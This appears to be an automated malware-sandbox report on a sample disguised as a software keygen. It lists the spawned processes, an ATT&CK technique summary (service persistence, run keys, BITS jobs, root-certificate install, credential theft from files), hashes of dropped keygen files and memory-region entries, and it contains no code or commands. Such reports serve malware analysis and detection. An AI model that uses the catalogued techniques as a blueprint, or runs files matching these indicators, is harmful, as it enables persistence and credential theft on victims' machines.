                                                                                                                                                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:5352
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BC6A.exe
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\BC6A.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:6968
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:6656
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:5320

                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                                    New Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1050

                                                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                                    New Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1050

                                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                                                    BITS Jobs

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1197

                                                                                                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      622441c9313ccf53e0524546a2401370

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      c23c097f9eab8119e0f4a4f6a2541153953e1c46

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      448c3dfa08bf9b5602b40fc49e85b80e23e58d05f51649624ed5701fc80894ab

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      45db2d650a424ea47534541bbf5d7426878cc4ae59a0bf6e4119d102928fc1f7524204909ee285b1d5badb71d692e22803e486f1d25a11feeb61c9003cdba83b

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                                                                                                                                                                    • \??\pipe\crashpad_1040_VSZDNQFSIQZCYPUR
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                                                    • \??\pipe\crashpad_5096_NPFMAESHEOUWHHDN
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                                                    • memory/184-293-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/192-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/296-267-0x00000285668D0000-0x0000028566940000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/344-291-0x00000000005C0000-0x00000000005C2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/352-259-0x0000022296760000-0x00000222967D0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/384-292-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                                                                                                                                    • memory/644-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/912-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1088-265-0x0000012A8AC90000-0x0000012A8AD00000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/1212-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1216-275-0x000001CC1B480000-0x000001CC1B4F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/1292-273-0x000001DB90AD0000-0x000001DB90B40000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/1336-257-0x000001AA72A00000-0x000001AA72A70000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/1336-288-0x000001AA75000000-0x000001AA75101000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                                                    • memory/1448-269-0x0000023482C40000-0x0000023482CB0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/1520-252-0x000001FF0D2B0000-0x000001FF0D2FB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                                                                                                                                    • memory/1520-253-0x000001FF0D370000-0x000001FF0D3E0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/1812-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1900-271-0x00000236FF230000-0x00000236FF2A0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/2052-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2112-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2116-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2272-249-0x0000000003220000-0x00000000033BC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                                                                                                                    • memory/2272-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2312-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2316-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2356-251-0x0000000004D80000-0x0000000004DDC000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      368KB

                                                                                                                                                                                                                                                                                                                                    • memory/2356-250-0x0000000004AEE000-0x0000000004BEF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                                                                                                                    • memory/2364-278-0x000000001B080000-0x000000001B082000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/2368-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2404-305-0x0000000002E00000-0x0000000002E44000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      272KB

                                                                                                                                                                                                                                                                                                                                    • memory/2480-290-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/2536-308-0x00000273A7270000-0x00000273A72E0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/2536-261-0x00000273A7010000-0x00000273A7080000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/2536-307-0x00000273A6FA0000-0x00000273A6FEB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                                                                                                                                    • memory/2572-310-0x0000018CA9E40000-0x0000018CA9EB0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/2572-263-0x0000018CA98A0000-0x0000018CA9910000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/2748-255-0x000001D431880000-0x000001D4318F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/2800-277-0x00000287E7EA0000-0x00000287E7F10000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/2820-280-0x000001BDD4D40000-0x000001BDD4DB0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      448KB

                                                                                                                                                                                                                                                                                                                                    • memory/2972-123-0x00007FFC78450000-0x00007FFC78451000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/2972-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3176-284-0x0000000010000000-0x0000000011157000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      17.3MB

                                                                                                                                                                                                                                                                                                                                    • memory/3176-283-0x0000000004AE0000-0x0000000005BE2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      17.0MB

                                                                                                                                                                                                                                                                                                                                    • memory/3212-303-0x00000000005B0000-0x00000000005C2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      72KB

                                                                                                                                                                                                                                                                                                                                    • memory/3212-302-0x0000000000580000-0x0000000000590000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                                                                    • memory/3500-289-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      172KB

                                                                                                                                                                                                                                                                                                                                    • memory/3816-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3844-294-0x00000000020B0000-0x00000000020B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/3968-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4080-282-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4116-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4132-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4140-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4208-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4220-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4224-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4244-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4292-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4336-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4388-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4408-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4436-297-0x0000000000E02000-0x0000000000E04000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/4436-301-0x0000000000E05000-0x0000000000E06000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4436-295-0x0000000000E00000-0x0000000000E02000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/4440-296-0x0000000002170000-0x0000000002172000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/4440-299-0x0000000002175000-0x0000000002177000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/4440-300-0x0000000002174000-0x0000000002175000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4440-298-0x0000000002172000-0x0000000002174000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                                                                                                                    • memory/4452-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4508-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4536-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4540-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4544-286-0x0000000004820000-0x00000000048B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      580KB

                                                                                                                                                                                                                                                                                                                                    • memory/4544-287-0x0000000000400000-0x0000000002BEA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      39.9MB

                                                                                                                                                                                                                                                                                                                                    • memory/4560-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4568-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4580-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4592-306-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      284KB

                                                                                                                                                                                                                                                                                                                                    • memory/4640-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4692-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4696-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4700-304-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      288KB

                                                                                                                                                                                                                                                                                                                                    • memory/4708-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4708-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4724-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4728-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4736-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4748-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4784-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4788-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4804-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4816-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4820-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4820-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4832-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4836-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4848-285-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      356KB

                                                                                                                                                                                                                                                                                                                                    • memory/4856-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4856-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4864-281-0x00000000052A0000-0x00000000052A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                    • memory/4896-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4920-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4920-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4944-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/4944-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5020-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5028-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5040-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5056-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5060-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5096-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/5116-201-0x0000000000000000-mapping.dmp